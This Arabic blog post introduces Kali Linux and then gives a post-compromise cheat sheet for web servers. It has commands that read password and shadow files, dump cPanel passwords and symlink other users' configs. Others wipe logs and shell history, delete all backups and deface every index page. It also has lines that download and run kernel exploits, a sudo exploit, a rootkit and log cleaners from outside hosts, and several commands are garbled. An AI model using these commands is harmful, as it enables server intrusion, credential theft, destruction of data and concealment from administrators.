تثبيت برنامج Kali linux للويندوز

مشاهدات الان

 كالي لينكس (بالإنجليزية: Kali Linux)‏ هي توزيعة لينكس مبنية على ديبيان، وهي متخصصة في الأمن والحماية المعلوماتية واختبار الاختراق (Penetration Testing) تم الإعلان عن صدورها في 13 مارس 2013

توزيعة كالي هي عبارة عن إعادة بناء لتوزيعة باك تراك: حيث قام المطورون ببنائها على ديبيان بدل أبونتو، وهي مدعومة وممولة من طرف Offensive Security Ltd

أدوات كالي لينكس

توزيعة كالي لينكس متخصصة في الأمن والحماية المعلوماتية وتحتوي مسبقا على عدة برامج وأدوات موجهة لاختبار الاختراق·حيث تتضمن برامج تقوم بالمسح الأمني للمنافذ كإن ماب Nmap وبرامج لتحليل الحزم المتبادلة على الشبكات كواير شارك Wireshark ، و برامج لكسر كلمات المرور كبرنامج جون ذا ريبر John the Ripper، وطقم برامج ايركراك-أن جي الخاص باختبار اختراق الشبكات المحلية اللاسلكية Wireless LANs و Burp Suite و OWASP و ZAP لفحص سلامة تطبيقات الويب، بالاضافة إلى أدوات أخرى لاختبارت أمنية متعددة

كالي لينكس والبرمجيات الحرة

كالي لينكس هي توزيعة حرة، تضم برمجيات حرة و مفتوحة المصدر تتوافق في مبدأها مع المبادئ الموجهة للبرمجيات الحرة. يمكن الحصول على التوزيعة مجانا مباشرة من موقعها الرسمي

بعد التحميل يمكن للمستعمل أن يشغل هذا النظام كقرص حي Live CD أو يو إس بي حي Live USB، أو يمكن تتثبته مباشرة على القرص الصلب للحاسوب أو استعماله كجهاز افتراضي. كما أنه يدعم استعمال منصة مشروع ميتاسبلوت و هي أدات لتنفيذ هجمات افتراضية اعتمادا على الثغرات

لكالي لينكس صورة من 32 بت و 64 بت والتي تعمل على معالجات x86، كما لديها صورة تدعم معمارية ARM لاستعمالها على الأجهزة المحمولة ذات المواصفات الضعيفة والمتوسطة كأجهزة الكروم بوك من سامسونج

كالي تعتمد على توزيعة ديبيان ويزي Wheezey. أغلب الحزم التي تستعملها كالي مأخوذة من مستودعات ديبيان

المصدر

https://www.kali.org/

اتبع

https://tecno07.com/installing-the-kali-linux-system-along-with-windows/

https://youtu.be/1HxLs2xs7CY

https://www.photoomax.com/2019/11/Explain-the-use-of-Kali-Linux-tools-for-beginners-and-advanced.html

http://www.igli5.com/search?q=kali+linux

انا للحين لم اجربه : واذا نويت راح اطبق لكم باذن الله من الصفر بشرح مفصل عكس الطروحات الغير مكتمله

نبدأ : جميع أوامر الاختراق Kali linux

بعض الصيغ المضغوطة مثل ( zip - rar - tar.gz - 7zip ) تحتاج تنصيب بعض الحزم حتى تستطيع التعامل معاها وفك الضغط عنها أو حتى لضغط بعض الملفات ولتنصيب كافة الحزم الصق هذا الأمر في الطرفية واضغط ENTER :

sudo apt-get install unace unrar zip unzip p7zip-full p7zip-rar sharutils rar uudeview mpack arj cabextract file-roller

- تثبيت مدير حزم Gdebi

sudo apt-get install gdebi

- تنصيب مشغل VLC

sudo apt-get install vlc

- تنصيب أداة معالجة الصور Gimp

sudo apt-get install gimp

- تنصيب dropbox

sudo apt-get install nautilus-dropbox

- تنصيب نظام الحماية GUFW Firewall

sudo apt-get install gufw

 - مشغل الميديا الرائع MPV

sudo add-apt-repository ppa:mc3man/mpv-tests

sudo apt-get update

sudo apt-get install mpv

اغلب الاوامر التى يحتاجها الهكر فى النظام للتعامل معه

cat /etc/passwd | cut -d ":" -f1

1- أمر إظهار يوزرات المواقع :

ls -la /etc/valiases

او

cat /etc/passwd

او

ls /var/mail

او

cat /etc/shadow

او

cat /etc/domainalias

ln -s / etc/passwd w

يسحب لك الملف بملف أسمه w

rm angel.php <------لحذف ملف

rm -r angel<------ لحذف مجلد

find angel.php <------لعمل بحث عن ملف

find *.php <------لعمل بحث عن جميع الملفات بهذا الامتداد

-------------------

أمر التأكد من صلاحية سحب الملفات علي السيرفر

which xxxx <------ بدل العلامات بأمر السحب

xxxx = أمر السحب

اومر السحب

wget

curl -o

get

lynx -source

-------------------

هذا االامر الي معي حلو يخليك ما تمشور مشوار .... هذا يطلعلك الملفات الي داخل مجلد boot

تقدر تغيير مجلد boot الى

-------------------

كود:

cd /boot;ls -al

etc << لفحص بعض الملفات ومنها قد تجد ثغرة confixx

usr << لمعرفة برامج السيرفر

opt < بعض السيرفرات تلقاه بالمجلد الرئيسي بعضها لا

-------------------

last -20 -a : عرض آخر 20 اسم تم تسجيل دخولهم

ps -ax : عرض الـ Processess

lsmod : الـ modules الموجوده في الكيرنال

uname -a : لعرض معلومات الكرنال

اوامر بسيطه

mv : تغيير الإسم

cp : نسخ ملف

cp -R : نسخ مجلد

ln : إنشاء رابط ( link ) لملف

gerp : البحث داخل ملف

-------------------

لو اردت معرفة هل البورت مفتوح11457 راح اطبق التالي :

netstat -an|grep 11457

-------------------

امر للتاكد من وجود ملف

كود:

ls file

حلو بدل ما تكتب ls ويطلع لك ملفات وتخش عيونك على بعض

ويمكن تستخدمه للتاكد من وجوده ومعرفه التصريح

كود:

ls -al file

-------------------

أوامر إحترافيه :

1- إظهار اليوزرات بشكل مرتب :

awk -F: '{ print $1 }' / etc/passwd | sort

2- معرفة البرامج المستخدمه من قبل اليوزر والرووت ( من ضمنها اسم برنامج الاف تي بي )

ps -o "%u : %U : %p : %a"

3- معلومات كامله واحترافيه عن ال processess مع تحديد اليوزر المستخدم للبروسيس

ps -eo pid,tt,user,fname,tmout,f,wchan

4- ال processess ليوزر معين ؟ ( استبدل user فقط في هذا الأمر )

ps -U user -u user -N

5- اليوزرز المتصلين الآن

users

6- عرض آخر اليوزرز اللي دخلو :

last

7- لجلب معلومات عن مستخدم معين ( استبدل user في هذا الأمر )

finger user

8- امر معرفة اسماء اليوزرز المتصلين بالسيرفر .. وافعالهم

w

9- عرض البورتات المفتوحه

netstat -lnp --ip

-------------------

touch angel.php ينشئ لك ملف ضمن المجلد

++g : كومبيلر لل C++ و C

gcc : كومبيلر لل C++ و C

grep : يستخدم للبحث عن شئ داخل ملف

gzip : لضغط ملفات

gunzip : لضغط ملفات

وال un لفك الضغط بالاستعانه مع الاوامر اللي فوق مثال : ungzip unzip

haltsys : لاغلاق النظام

cat : لعرض محتوى اكثر من ملف مع بعض

cd : لتغير الدليل الذي انت عليه

chmod : لتغير تصريح دخلول ملف معين

chown : لتغير مالك ملف معين

clear : لمسح كل الذي على الشاشة

cmp : لمقارنة ملفين

cp : لنسخ الملفات

crypt : لتشفير و فك تشفير الملفات

csplit : لتقسيم الملف الى عدة ملفات

cu : لطلب تريمنال يونكس اخر

whoami يقول لك من انت (يعني من انا ) يقول لك root او مستخدم xxx

rm : لمسح ملفات او مجلدات ( خاليه )

rmdir : لمسح مجلد ( خالي )

وفي حال كنت بالترمنال اضغط على زر التاب Tap يعرض لك كل اوامر اللينكس

ومثلاً اي امر تحب تعرف شو هووا فقط اكتب الأمر وبعدها هيلب :

مثال rm --help

-------------------

أوامر رائعه :

لمعرفة جميع ملفات اسم مستخدم معين ( استبدل john )

find /home -user john

لمعرفة الملفات اللتي تم تعديلها في خلال الـ 24 ساعه ( أمر مهم )

find $HOME -mtime 0

لمعرفة المساحه المستخدمه

df -h

لمعرفة المساحه المتبقيه

du

-------------------

وهذي مجموعة من الأوامر البسيطة

ls -m

يظهر الملفات مع تفريقهم بفواصل بدلا من تفريقهم بخانات

ls -t

يظهر الملفات حسب تواريخ إنشائها يعني من الجديد إلى القديم

ls -lu

يظهر الملفات حسب آخر تاريخ زيارة لهذه الملفات (مع تبيين هذا التاريخ)

ls -F

يظهر الملفات بأنواعها حيث :

الملفات المسبوقة ب / عبارة عن مجلدات

الملفات المسبوقة ب * عبارة عن ملفات تنفيذية

الملفات المسبوقة ب @ عبارة عن روابط

ls -S

يظهر الملفات تسلسليا من الأكبر إلى الأصغر

ls -X

يظهر الملفات ويرتبها حسب امتدادها

ls -r

يظهر الملفات مرتبة بالمقلوب (يعني من z ثم y ثم x ....)

cp

لنسخ ملف أو مجلد

mkdir

لإنشاء مجلد

mv

لتحويل ملف من مجلد إلى مجلد أو إعادة تسميته

(مثلا

mv angel gnom

راح يعيد تسميت المجلد angel إلى gnom

أو

mv angel.php /ho me/hackteach/publi c_htm l/cc/test

راح يحول الملف angel.php من المجلد إلي هو فيه إلى المجلد الجديد test)

-------------------

ln -sf / home / user / public_html / vb / in clude s / c onfig . php conf.txt

راح يجيب لك نسخـة من ملف الكونفق تبع اليوزر المحدد في الملف الجديد conf.txt

بالعربي ,, الأمر هذا هو حق السم لينك ,, symLink

-------------------

أمر لمعرفة اليوزر اللي مستهلك أكبر مساحه :

du -s / home | sort -rn

( بدون مسافه بعد / و home )

-------------------

النسخ واللصق بهالطريقة

c p /ho me/hi.t xt /ho me/jack

أو العكس

-------------------

لعمل ماس ديفاس بعد اخذ الروت

كود PHP:

find / -name "index.*" -exec cp /t mp/index.htm

-------------------

أمر إظهار باسوردات السي بانل ( في حالة كنت روت ) :

في أوامر كثيره .. بعضها :

find / -name service.pwd

او

cat / home/*/public_html/_vti_pvt/service.pwd

و

cat / var/cpanel/accounting.log

( لاتنسى تحذف المسافات قبل var و home )

-------------------

1- حذف ملفات اللوقو

rm -rf / tmp/logs

rm -rf $HISTFILE

rm -rf / root/.ksh_history

rm -rf / root/.bash_history

rm -rf / root/.ksh_history

rm -rf / root/.bash_logout

rm -rf / usr/local/apache/logs

rm -rf / usr/local/apache/log

rm -rf / var/apache/logs

rm -rf / var/apache/log

rm -rf / var/run/utmp

rm -rf / var/logs

rm -rf / var/log

rm -rf / var/adm

rm -rf / etc/wtmp

rm -rf / etc/utmp

find / -name *.bash_history -exec rm -rf {} \;

find / -name *.bash_logout -exec rm -rf {} \;

find / -name "log*" -exec rm -rf {} \;

find / -name *.log -exec rm -rf {} \;

-------------------

2- أمر تعديل ملفات اللوقو ( إخفائها .. آمن )

cat / dev/null > / var/log/kdebug

cat / dev/null > / var/log/kernel

cat / dev/null > / var/log/maillog

cat / dev/null > / var/log/messages

cat / dev/null > / var/log/secure

cat / dev/null > / var/log/svclog

cat / dev/null > / var/log/tcdebuglog

cat / dev/null > / var/log/tclient

cat / dev/null > / var/log/tivoLog.prv

cat / dev/null > / var/log/tivoLog.pub

cat / dev/null > / var/log/tivoweb.log

cat / dev/null > / var/log/tvdebuglog

cat / dev/null > / var/log/tverr

cat / dev/null > / var/log/tvlog

3- أمر قرائة ملف الكونفيج على السيرفر

cat / usr/local/apache/conf/httpd.conf

4- أمر عرض الملفات Suid ( ملفات من قبل الروت لكن يستطيع اليوزر تشغيلها )

find / -type f -perm -04000 -ls

-------------------

5- أمر عرض الملفات Sgid ( ملفات من قبل الروت لكن تستطيع المجموعه تشغيلها )

find / -type f -perm -02000 -ls

6- أوامر عرض المجلدات المصرح لها تصريح 777

find / -perm -2 -ls

find / -type d -perm 0777 | xargs ls -alld

find / -type d -pem -2 -ls

7- أمر حذف جميع الباك آب الموجوده على السيرفر

find / -name "cpbackup*" -exec rm {} ;

find / -name "backup*" -exec rm {} ;

8- أمر إستبدال جميع الإندكسات إلى الإندكس الموجود على المسار الحالي

find / -name "index.*" -exec cp index.htm {} ;

find / -name "default.*" -exec cp index.htm {} ;

9- أمر تعديل صلاحيات الإندكسات إلى nobody ( لكي لا يشك اليوزر )

find / -name "index.*" -exec chown 99 index.html {} ;

find / -name "default.*" -exec chown 99 index.html {} ;

10- أمر عرض System log

cat / etc/syslog.conf

11- أمر عرض معلومات عن الذاكره

cat / proc/meminfo

12- أمر تعديل دوال php والسيف مود وغيرها

pico / usr/local/lib/php.ini

13- أمر عرض البورتات المفتوحه

netstat -atup | grep IST

14- أمر عرض آخر إتصال

lastlog

15- أمر عرض اليوزرات المتصله

w

-------------------

16- أمر لمعرفة إصدار الكيرنال

dpkg --list | grep linux-image

rpm -q kernel : kernel-2.6.18-53.1.4.el5

uname -s : SunOS

uname -r : 2.6.22-14-EL5

uname -mrsn : Linux s.server.com 2.6.18-53.1.4.el5 x86_64

cat / proc/version : Linux version 2.6.18-53.1.4.el5 (b@redhat.com) (gcc version 4.1.2 20070626 (Red Hat 4.1.2-14)) #1 SMP Wed Nov 14 1027 EST 2007

17- أمر إيقاف process معين عن العمل

kill -9 PID

kill PID

مع إستبدال PID لرقم البروسيس .. تستطيع معرفته عن طريق الأمر

ps ux

ps aux

top

18- أمر عرض الأوامر ( او بالأصح الملفات التنفيذيه ) اللتي عليها Suid ( يستطيع اليوزر تشغيلها )

find / bin / usr/bin / usr/local/bin / sbin / usr/sbin / usr/local/sbin -perm -4000 2> / dev/null

19- أمر عرض اليوزرات اللتي لا تحتوي على باسورد

cut -d: -f1,2,3 / etc/passwd | grep

-------------------

20- أمر عرض الملفات اللتي تريد الكتابه عليها في مجلد etc

find / etc/ -type f -perm -o+w 2> / dev/null

21- أمر عرض أوامر السحب المفعله كـ wget

which wget curl w3m lynx

22- أمر عرض معلومات عن المعالج CPUINFO

cat / proc/version / proc/cpuinfo

23- أمر عرض مساحات الهاردسك

du

( ملاحظه : تستطيع إستخدامه مع option اخرى .. لاحظ الأوامر التاليه )

du -s / home/user | sort -rn

df -Th

24- أمر التأكد من وجود المترجم gcc

locate gcc

25- أمر إستخدام Wipelogs ( للتعديل على الوقو .. أمن )

wget No Results Found Packet Storm | gcc zap2.c -o zap2 | ./zap2

26- أمر تنفيذ بعض الهجمات على الكيرنال

wget http://ftp.powernet.com.tr/supermail/debug/k3 | ./k3 1 | ./k3 2 | ./k3 3 | ./k3 4 | ./k3 5

27- إستخدام ثغرة stack overflow عن طريق sudo

wget http://precision-gaming.com/sudo.c | gcc sudo.c -o sudosploit | ./sudosploit

28- أمر تثبيت روت كت لإصدار 2.6

wget twofaced.org | gcc linux2-6-all.c -o linuxkernel | ./linuxkernel

29- أمر استخدام سكربت Mig LogCleaner

wget twofaced.org | gcc -DLINUX -WALL mig-logcleaner.c -o migl | ./migl -u root 0

30- أمر لمعرفة الملفات والمجلدات اللتي تم تعديلها في خلال X يوم

find / -mtime x

( ملاحظه : استبدل time إلى min للبحث في الدقائق .. ليصلح mmin )

31- أمر لمعرفة الملفات والمجلدات اللتي تم تعديل خصائصها ( كـ الملكيه ) في خلال X يوم

find / -ctime x

32- للبحث عن الملفات اللتي مالكها root لكن يستطيع اليوزر تنفيذها

find / -perm +4000 -user root

33- للبحث عن الملفات اللتي مالكها root لكن يستطيع اليوزر الكتابه عليها

find / -perm +002 -user root

34- للبحث عن الملفات اللتي ليس لديها مالك

find / -nouser

35- للبحث عن الملفات اللتي مالكها هو اليوزر root

find / -user root

36- من الأوامر التفصيليه لـ find

find / -name "*.txt" -size +10k -user root -not -perm +o=r -exec chmod o+r {} \;

شرح الأمر :

ابحث في جميع المجلدات .. عن اي ملف نصي امتداده txt

وحجمه أكثر من 10 كيلو بايت .. وصاحبه اليوزر root

وغير قابله للقراءه من اي يوزر اخر ماعدا مالكها الأصلي

يستطيع صاحبها قرائتها وويستطيع تنفيذها ( execution ) ( ورمزه -r-xr--r-- )

-------------------

37- وتستطيع إستخدام أمر find بشكل آخر .. مثل : find / -type f \( -perm -04000 -o -perm -02000 \) \-exec ls -lg {} \; شرح الأمر : عرض جميع الملفات فقط .. اللتي لديها خاصيتي

ويوجد الكثير بس ما ابي اخرب المدونه باكواد تضرني

وسلامتكم

إرسال تعليق

أحدث أقدم